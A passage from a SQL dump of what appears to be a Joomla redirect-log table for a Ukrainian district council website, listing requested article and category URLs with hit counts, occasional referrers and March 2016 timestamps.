00:00:00',301),(26757,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=30&layout=blog&Itemid=61&lang=uk','','','',1,0,'2016-03-04 15:49:03','0000-00-00 00:00:00',301),(26758,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&id=30:--30122010-&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-04 19:34:19','0000-00-00 00:00:00',301),(26759,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=957:199-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-04 19:55:14','0000-00-00 00:00:00',301),(26760,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=632:-2011-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-04 19:56:31','0000-00-00 00:00:00',301),(26761,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=341:-6-6-15-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2016-03-04 21:59:22','0000-00-00 00:00:00',301),(26762,'http://www.malyn-rayrada.org.ua/index.php?option=com_user&view=registration','','','',3,0,'2016-03-04 22:21:15','0000-00-00 00:00:00',301),(26763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1010:-22-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2016-03-04 22:25:30','0000-00-00 00:00:00',301),(26764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=788:---------lr--2012-2015--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2016-03-04 22:50:27','0000-00-00 00:00:00',301),(26765,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&catid=13&Itemid=33&lang=uk','','','',2,0,'2016-03-04 22:51:10','0000-00-00 00:00:00',301),(26766,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1004:2013-05-04-11-41-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2016-03-04 22:51:15','0000-00-00 00:00:00',301),(26767,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=740:-lr-&catid=43&Itemid=82&lang=ru','','','',2,0,'2016-03-04 22:52:10','0000-00-00 00:00:00',301),(26768,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=563:-30012012185-12&catid=39&Itemid=76&lang=ru','','','',2,0,'2016-03-04 22:52:14','0000-00-00 00:00:00',301),(26769,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=631:-i-2012-&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-04 22:58:19','0000-00-00 00:00:00',301),(26770,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=583:-l-lr&catid=40:--28032012-&Itemid=77&lang=ru','','','',1,0,'2016-03-04 23:00:29','0000-00-00 00:00:00',301),(26771,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=321:------------l---------r--2011-2016-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-04 23:00:57','0000-00-00 00:00:00',301),(26772,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=596:2012-02-28-12-59-05&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-05 00:26:11','0000-00-00 00:00:00',301),(26773,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=3&lang=uk','','','',2,0,'2016-03-05 00:36:23','0000-00-00 00:00:00',301),(26774,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=333:-2011-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-05 00:39:05','0000-00-00 00:00:00',301),(26775,'http://www.malyn-rayrada.org.ua/index.php/628-girnichovidobuvni-pidpriemstva-oblasti-pid/','','','',3,0,'2016-03-05 00:39:20','0000-00-00 00:00:00',301),(26776,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=1270:2014-04-08-13-49-40','','','',6,0,'2016-03-05 00:54:17','0000-00-00 00:00:00',301),(26777,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1059:2013-07-24-05-42-15&lang=en&option=com_content&view=article','','','',1,0,'2016-03-05 02:11:24','0000-00-00 00:00:00',301),(26778,'http://www.malyn-rayrada.org.ua/index.php/component/user/?view=registration','','','',3,0,'2016-03-05 02:11:45','0000-00-00 00:00:00',301),(26779,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1146:2013-11-27-10-09-00&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-05 02:16:25','0000-00-00 00:00:00',301),(26780,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=636:-2011-2015-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-05 03:50:22','0000-00-00 00:00:00',301),(26781,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',3,0,'2016-03-05 05:28:48','0000-00-00 00:00:00',301),(26782,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=587:2012-02-27-13-44-05&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-05 05:29:48','0000-00-00 00:00:00',301),(26783,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/970--90-?Itemid=0&lang=ru','','','',1,0,'2016-03-05 05:39:18','0000-00-00 00:00:00',301),(26784,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=978:-6612-','','','',29,0,'2016-03-05 05:49:40','0000-00-00 00:00:00',301),(26785,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=1130:2013-11-07-14-04-12','','','',7,0,'2016-03-05 05:52:26','0000-00-00 00:00:00',301),(26786,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=946:-l-r-2011-2015-&Itemid=88&lang=uk&option=com_content&view=article','','','',30,0,'2016-03-05 05:52:55','0000-00-00 00:00:00',301),(26787,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1173:2014-01-15-10-37-18&Itemid=&lang=ru&option=com_content&view=article','','','',8,0,'2016-03-05 05:54:26','0000-00-00 00:00:00',301),(26788,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=799:2012-10-18-13-37-03&Itemid=84&lang=uk&option=com_content&view=article','','','',56,0,'2016-03-05 05:55:45','0000-00-00 00:00:00',301),(26789,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/970--90-?lang=ru','','','',8,0,'2016-03-05 05:55:57','0000-00-00 00:00:00',301),(26790,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=740:-lr-&Itemid=82&lang=uk&option=com_content&view=article','','','',31,0,'2016-03-05 05:57:43','0000-00-00 00:00:00',301),(26791,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1059:2013-07-24-05-42-15&Itemid=14&lang=uk&option=com_content&view=article','','','',26,0,'2016-03-05 05:57:48','0000-00-00 00:00:00',301),(26792,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=731:2012-07-02-08-51-09','','','',33,0,'2016-03-05 06:02:52','0000-00-00 00:00:00',301),(26793,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1216:-q-q&lang=en&option=com_content&view=article','','','',8,0,'2016-03-05 06:05:06','0000-00-00 00:00:00',301),(26794,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=990:-2013-','','','',11,0,'2016-03-05 06:05:14','0000-00-00 00:00:00',301),(26795,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=825:-q-q&lang=ru&option=com_content&view=article','','','',25,0,'2016-03-05 06:10:19','0000-00-00 00:00:00',301),(26796,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=753:2012-09-05-09-48-36&lang=uk&option=com_content&view=article','','','',22,0,'2016-03-05 06:10:32','0000-00-00 00:00:00',301),(26797,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=741:---------l----r&Itemid=82&lang=uk&option=com_content&view=article','','','',37,0,'2016-03-05 06:10:40','0000-00-00 00:00:00',301),(26798,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=772:-2011-2012-&Itemid=84&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-05 06:22:39','0000-00-00 00:00:00',301),(26799,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1004:2013-05-04-11-41-00&Itemid=0&lang=uk&option=com_content&view=article','','','',8,0,'2016-03-05 06:22:42','0000-00-00 00:00:00',301),(26800,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=956:2013-03-07-14-51-33&Itemid=0&lang=uk&option=com_content&view=article','','','',44,0,'2016-03-05 06:24:27','0000-00-00 00:00:00',301),(26801,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=543:2012-01-26-11-58-53&catid=39:-22022012-&Itemid=76&lang=ru','','','',2,0,'2016-03-05 06:28:12','0000-00-00 00:00:00',301),(26802,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=957:199-','','','',2,0,'2016-03-05 06:38:23','0000-00-00 00:00:00',301),(26803,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=956:2013-03-07-14-51-33&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2016-03-05 06:38:28','0000-00-00 00:00:00',301),(26804,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=972:2013-03-19-10-50-05&lang=ru&option=com_content&view=article','','','',4,0,'2016-03-05 07:06:45','0000-00-00 00:00:00',301),(26805,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1000:1&lang=en&option=com_content&view=article','','','',2,0,'2016-03-05 08:25:36','0000-00-00 00:00:00',301),(26806,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1147:2013-11-28-09-57-12&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-05 10:26:40','0000-00-00 00:00:00',301),(26807,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&id=40&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-05 10:37:07','0000-00-00 00:00:00',301),(26808,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?id=1341:-14052014-&catid=59&lang=en','','','',7,0,'2016-03-05 10:41:08','0000-00-00 00:00:00',301),(26809,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=543:2012-01-26-11-58-53&catid=39:-22022012-&Itemid=76&lang=uk','','','',2,0,'2016-03-05 12:19:16','0000-00-00 00:00:00',301),(26810,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=42:--16052012-&layout=blog&Itemid=80&lang=uk&limitstart=5','','','',1,0,'2016-03-05 13:00:11','0000-00-00 00:00:00',301),(26811,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=1293:-2014-&catid=58:--30042014-&lang=uk','','','',8,0,'2016-03-05 14:10:57','0000-00-00 00:00:00',301),(26812,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=784:-9-&lang=en&option=com_content&view=article','','','',5,0,'2016-03-05 14:36:13','0000-00-00 00:00:00',301),(26813,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=830:2012-11-27-08-09-31&lang=en&option=com_content&view=article','','','',1,0,'2016-03-05 15:02:49','0000-00-00 00:00:00',301),(26814,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&id=58:--30042014-&lang=uk&layout=blog&option=com_content&view=category','','','',3,0,'2016-03-05 15:15:47','0000-00-00 00:00:00',301),(26815,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=872:2012-12-17-18-45-20&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-05 16:13:33','0000-00-00 00:00:00',301),(26816,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=705:-l-r&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-05 16:33:07','0000-00-00 00:00:00',301),(26817,'http://www.malyn-rayrada.org.ua/index.php?Itemid=93&id=52:--16082013-&lang=en&layout=blog&option=com_content&view=category','','','',4,0,'2016-03-05 17:48:55','0000-00-00 00:00:00',301),(26818,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=uk&limitstart=5','','','',6,0,'2016-03-05 18:33:47','0000-00-00 00:00:00',301),(26820,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1216:-q-q&Itemid=0&lang=ru&option=com_content&view=article','','','',9,0,'2016-03-05 19:41:25','0000-00-00 00:00:00',301),(26821,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=210:-2010-&Itemid=60&lang=en&option=com_content&view=article','','','',4,0,'2016-03-05 20:18:44','0000-00-00 00:00:00',301),(26822,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&Itemid=14&lang=uk&option=com_content&view=article','','','',8,0,'2016-03-05 20:23:45','0000-00-00 00:00:00',301),(26823,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=791:2012-10-17-06-06-34&catid=45:--14112012-&Itemid=84&lang=en','','','',3,0,'2016-03-05 20:53:23','0000-00-00 00:00:00',301),(26824,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1015:-200-&Itemid=&lang=ru&option=com_content&view=article','','','',9,0,'2016-03-05 20:53:26','0000-00-00 00:00:00',301),(26825,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=367:-1620-19072011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-05 21:17:03','0000-00-00 00:00:00',301),(26826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=42:--16052012-&layout=blog&Itemid=80&lang=ru&limitstart=5','','','',5,0,'2016-03-05 21:40:06','0000-00-00 00:00:00',301),(26827,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=434:2011-10-21-15-10-36&Itemid=72&lang=en&option=com_content&view=article','','','',5,0,'2016-03-05 22:36:11','0000-00-00 00:00:00',301),(26828,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=615:-------26032012495-12&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-05 22:54:32','0000-00-00 00:00:00',301),(26829,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&id=56:--03022014-&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',3,0,'2016-03-06 00:38:56','0000-00-00 00:00:00',301),(26830,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=892:2013-01-08-13-26-18&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',1,0,'2016-03-06 02:11:51','0000-00-00 00:00:00',301),(26831,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=310:-2011-&lang=uk&option=com_content&view=article','','','',4,0,'2016-03-06 03:20:55','0000-00-00 00:00:00',301),(26832,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=841:2012-12-10-13-54-17&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-06 03:35:40','0000-00-00 00:00:00',301),(26833,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=13:2010-06-06-03-57-58&id=13:2010-06-06-04-07-00&itemid=33&lang=en&option=com_content&view=article','','','',1,0,'2016-03-06 04:10:55','0000-00-00 00:00:00',301),(26834,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=15&id=18:2010-06-06-10-06-41&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-06 04:45:56','0000-00-00 00:00:00',301),(26835,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=862:------qq&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-06 06:32:37','0000-00-00 00:00:00',301),(26836,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=825:-q-q&Itemid=14&lang=uk&option=com_content&view=article','','','',7,0,'2016-03-06 06:42:20','0000-00-00 00:00:00',301),(26837,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=643:-6-&catid=36&Itemid=70&lang=uk','','','',14,0,'2016-03-06 06:42:29','0000-00-00 00:00:00',301),(26838,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=730:2012-07-02-05-04-18&Itemid=14&lang=en&option=com_content&view=article','','','',10,0,'2016-03-06 07:09:51','0000-00-00 00:00:00',301),(26839,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=956:2013-03-07-14-51-33&Itemid=0&lang=ru&option=com_content&view=article','','','',13,0,'2016-03-06 07:13:57','0000-00-00 00:00:00',301),(26840,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=932:-l90-r&Itemid=86&lang=en&option=com_content&view=article','','','',9,0,'2016-03-06 07:16:15','0000-00-00 00:00:00',301),(26841,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=717:2012-06-14-15-22-29&catid=43:--25072012-&Itemid=82&lang=en','','','',4,0,'2016-03-06 07:16:28','0000-00-00 00:00:00',301),(26842,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=1015:-200-','','','',4,0,'2016-03-06 07:16:28','0000-00-00 00:00:00',301),(26843,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=957:199-','','','',4,0,'2016-03-06 07:16:35','0000-00-00 00:00:00',301),(26844,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=701:-2011-2017-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-06 08:08:59','0000-00-00 00:00:00',301),(26845,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:----192011-&catid=11&Itemid=16&lang=uk','','','',1,0,'2016-03-06 08:50:26','0000-00-00 00:00:00',301),(26846,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1075-2013-09-06-09-25-33?Itemid=0&lang=en','','','',2,0,'2016-03-06 08:56:37','0000-00-00 00:00:00',301),(26847,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=741:---------l----r&catid=43:--25072012-&Itemid=82&lang=en','','','',2,0,'2016-03-06 08:56:51','0000-00-00 00:00:00',301),(26848,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&id=58:--30042014-&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-06 09:19:35','0000-00-00 00:00:00',301),(26849,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/941-2013-02-27-14-30-15/','','http://go.mail.ru/search_images','',2,0,'2016-03-06 09:36:41','0000-00-00 00:00:00',301),(26850,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1163:2013-12-20-07-44-35&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-06 09:40:02','0000-00-00 00:00:00',301),(26851,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=869:2012-12-16-16-05-45&lang=en&option=com_content&view=article','','','',1,0,'2016-03-06 10:05:56','0000-00-00 00:00:00',301),(26852,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=226:-2011-&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',1,0,'2016-03-06 10:24:49','0000-00-00 00:00:00',301),(26853,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=743:2012-07-26-08-11-32&lang=en&option=com_content&view=article','','','',1,0,'2016-03-06 10:34:24','0000-00-00 00:00:00',301),(26854,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&id=54:--29112013-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-06 11:40:41','0000-00-00 00:00:00',301),(26855,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=462:-2012-&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-06 11:56:57','0000-00-00 00:00:00',301),(26856,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-06 14:47:44','0000-00-00 00:00:00',301),(26857,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=875:-2013-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-06 14:52:15','0000-00-00 00:00:00',301),(26858,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1048:2013-07-10-05-53-06&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-06 15:00:13','0000-00-00 00:00:00',301),(26859,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1048:2013-07-10-05-53-06&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-06 15:55:07','0000-00-00 00:00:00',301),(26860,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=475:2011-11-22-07-58-34&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-06 16:41:58','0000-00-00 00:00:00',301),(26861,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&id=34:--15062011-&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-06 16:58:21','0000-00-00 00:00:00',301),(26862,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=279:2011-03-31-08-20-23&lang=en&option=com_content&view=article','','','',2,0,'2016-03-06 17:03:17','0000-00-00 00:00:00',301),(26863,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=449:2011-10-28-08-04-47&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-06 17:57:10','0000-00-00 00:00:00',301),(26864,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-06 18:23:44','0000-00-00 00:00:00',301),(26865,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1022:-lr-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-06 19:48:17','0000-00-00 00:00:00',301),(26866,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=957:199-&lang=en&option=com_content&view=article','','','',5,0,'2016-03-06 19:50:19','0000-00-00 00:00:00',301),(26867,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=825:-q-q','','','',20,0,'2016-03-06 20:08:26','0000-00-00 00:00:00',301),(26868,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=1075:2013-09-06-09-25-33','','','',3,0,'2016-03-06 20:09:43','0000-00-00 00:00:00',301),(26869,'http://www.malyn-rayrada.org.ua/index.php?catid=48&id=955:2013-03-07-06-31-04&Itemid=87&lang=ru&option=com_content&view=article','','','',4,0,'2016-03-06 20:11:37','0000-00-00 00:00:00',301),(26870,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=18:2010-06-06-10-06-41&Itemid=&lang=ru&option=com_content&view=article','','','',13,0,'2016-03-06 20:19:11','0000-00-00 00:00:00',301),(26871,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=841:2012-12-10-13-54-17&Itemid=85&lang=ru&option=com_content&view=article','','','',5,0,'2016-03-06 20:19:46','0000-00-00 00:00:00',301),(26872,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=563:-30012012185-12&Itemid=76&lang=en&option=com_content&view=article','','','',12,0,'2016-03-06 20:20:49','0000-00-00 00:00:00',301),(26873,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=434:2011-10-21-15-10-36&catid=37&Itemid=72&lang=ru','','','',7,0,'2016-03-06 20:23:07','0000-00-00 00:00:00',301),(26874,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=649:-2011-2015-&catid=42&Itemid=80&lang=en','','','',8,0,'2016-03-06 20:26:25','0000-00-00 00:00:00',301),(26875,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=975:-2012-2015-&Itemid=88&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-06 20:26:47','0000-00-00 00:00:00',301),(26876,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=745:2012-07-30-09-12-07&Itemid=14&lang=uk&option=com_content&view=article','','','',7,0,'2016-03-06 20:38:34','0000-00-00 00:00:00',301),(26877,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1221:2014-02-22-08-09-27&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-06 20:39:00','0000-00-00 00:00:00',301),(26878,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=717:2012-06-14-15-22-29&catid=43&Itemid=82&lang=ru','','','',5,0,'2016-03-06 20:50:37','0000-00-00 00:00:00',301),(26879,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=211:2010-12-15-14-46-24&catid=29:--15122010-&Itemid=60&lang=en','','','',6,0,'2016-03-06 21:00:08','0000-00-00 00:00:00',301),(26880,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=651:-2012-&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-06 21:04:55','0000-00-00 00:00:00',301),(26881,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1257:2014-03-29-18-03-31&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-06 21:08:39','0000-00-00 00:00:00',301),(26882,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=963:2013-03-13-06-16-53&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-06 22:11:06','0000-00-00 00:00:00',301),(26883,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-06 23:33:56','0000-00-00 00:00:00',301),(26884,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=729:-l20-r&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2016-03-06 23:54:44','0000-00-00 00:00:00',301),(26885,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1262:2014-03-31-11-36-45&Itemid=17&lang=uk&option=com_content&view=article','','','',19,0,'2016-03-07 00:00:03','0000-00-00 00:00:00',301),(26886,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=892:2013-01-08-13-26-18&Itemid=14&lang=uk&option=com_content&view=article','','','',11,0,'2016-03-07 00:00:19','0000-00-00 00:00:00',301),(26887,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=825:-q-q&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-07 01:50:18','0000-00-00 00:00:00',301),(26888,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=uk&layout=blog&limitstart=25&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-07 03:16:37','0000-00-00 00:00:00',301),(26889,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=829:24-1600-l-r&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-07 03:49:22','0000-00-00 00:00:00',301),(26890,'http://www.malyn-rayrada.org.ua/index.php/670-7-grudnja-den-miscevogo-samovrjaduvannja/','','http://go.mail.ru/search_images','',2,0,'2016-03-07 04:31:18','0000-00-00 00:00:00',301),(26891,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=315:2011-05-20-13-07-47&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-07 06:15:33','0000-00-00 00:00:00',301),(26892,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1075:2013-09-06-09-25-33&lang=en&option=com_content&view=article','','','',2,0,'2016-03-07 07:17:14','0000-00-00 00:00:00',301),(26893,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=699:-2011-2015-&lang=uk&option=com_content&view=article','','','',4,0,'2016-03-07 07:54:08','0000-00-00 00:00:00',301),(26894,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=584:-20-2011-100-l-r-&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-07 13:48:03','0000-00-00 00:00:00',301),(26895,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=562:-19122011194-30122011202&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-07 14:57:59','0000-00-00 00:00:00',301),(26896,'http://www.malyn-rayrada.org.ua/magento_version','','','',1,0,'2016-03-07 15:18:19','0000-00-00 00:00:00',301),(26897,'http://malyn-rayrada.org.ua/magento_version','','','',1,0,'2016-03-07 15:18:20','0000-00-00 00:00:00',301),(26898,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2016-03-07 15:25:53','0000-00-00 00:00:00',301),(26899,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=939:-18-&lang=en&option=com_content&view=article','','','',1,0,'2016-03-07 15:25:53','0000-00-00 